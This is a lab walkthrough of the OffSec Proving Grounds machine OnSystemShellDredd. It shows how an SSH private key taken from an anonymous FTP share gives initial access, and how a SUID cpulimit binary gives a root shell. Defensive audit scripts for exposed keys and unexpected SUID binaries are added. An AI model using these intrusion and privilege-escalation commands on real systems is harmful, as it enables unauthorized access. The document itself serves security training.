This is a walkthrough of the machine OnSystemShellDredd from OffSec's Proving Grounds Play labs.

Machine information:

  • Level: Easy
  • Community rating: Easy
  • Flags: 2
  • OS: Linux
  • Vector: FTP, local

Nmap

sudo nmap -A --open -sV -sC -v -p- <IP>

Starting off with an Nmap scan, we discover the following open ports:

  • 21 - FTP
  • 61000 - SSH

Initial access

Based on the Nmap scan and the NSE script output, anonymous login on FTP is allowed.

Looking at what's available, we discover a hidden directory named .hannah with a private SSH key (id_rsa) inside.

To obtain initial access, we download the private key over FTP, restrict its permissions so the SSH client will accept it, and SSH in as hannah (note the non-standard port 61000) to obtain the first flag, local.txt:

get id_rsa

chmod 600 id_rsa

ssh hannah@<IP> -i id_rsa -p 61000
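From the defender's side, the weakness here is that a hidden directory under the anonymous FTP root held a usable private key. The following audit script is an added example, not part of the original walkthrough: given the directory an FTP server exports (the path is an assumption; substitute the server's real root), it lists hidden directories and any file carrying a PEM or OpenSSH private-key header, so a key like the one found here shows up in a routine check rather than in an attacker's directory listing.

```shell
#!/bin/sh
# Audit a directory exported to anonymous FTP users for private key material.
# Added defensive example, not part of the original walkthrough.
# The directory argument is whatever the FTP server exports (assumption: the
# caller knows it, e.g. /srv/ftp); nothing here depends on a specific server.

find_exposed_keys() {
    root="$1"
    # Dot-directories do not show up in a plain listing, but any FTP client can
    # enter them by name; report every one so nothing hides under the root.
    find "$root" -mindepth 1 -type d -name '.*' | sed 's/^/hidden-dir: /'
    # Report any file containing a PEM or OpenSSH private-key header, whatever
    # the file is named. The -e is required because the pattern begins with '-'.
    grep -rls -e '-----BEGIN [A-Z ]*PRIVATE KEY-----' "$root" | sed 's/^/private-key: /'
}

# Example: find_exposed_keys /srv/ftp
```

Disabling anonymous login on the FTP server removes the exposure entirely; the audit is for catching keys that still end up in a shared tree by mistake, hidden directory or not.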

Privilege escalation

Using manual enumeration, looking for executables with the SUID bit set, we find /usr/bin/cpulimit:

find / -perm -u=s -type f 2>/dev/null

We can abuse this to escalate privileges by running:

cpulimit -l 100 -f -- /bin/sh -p
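The privilege escalation works only because cpulimit carries the SUID bit, which a stock install does not give it. An allowlist check is the straightforward way to catch that. The script below is an added example, not part of the original walkthrough: it takes the output of the same find command and reports every binary missing from a reviewed list of programs expected to be SUID on the host. The allowlist shown is a constructed sample; build the real one from a known-good image of the same distribution.

```shell
#!/bin/sh
# Report SUID binaries that are not on a reviewed allowlist.
# Added defensive example, not part of the original walkthrough.

# Constructed sample allowlist of binaries that commonly ship SUID on a
# Debian-family host. Assumption: the real list is generated from a
# known-good installation and reviewed, not copied from here.
SUID_ALLOWLIST='
/usr/bin/passwd
/usr/bin/su
/usr/bin/sudo
/usr/bin/mount
/usr/bin/umount
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
'

# Reads one path per line on stdin and prints each one that is not on the
# allowlist. -F matches literally, -x matches the whole line, so a prefix such
# as /usr/bin/su never matches /usr/bin/sudo by accident.
unexpected_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        if ! printf '%s\n' "$SUID_ALLOWLIST" | grep -Fxq -- "$path"; then
            echo "unexpected SUID: $path"
        fi
    done
}

# Live use on a host (the same find the walkthrough runs, now as a check):
#   find / -perm -u=s -type f 2>/dev/null | unexpected_suid
```

Run from cron or a configuration-management check, a non-empty result is the alert: on this machine it would have flagged /usr/bin/cpulimit the moment the bit was set.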
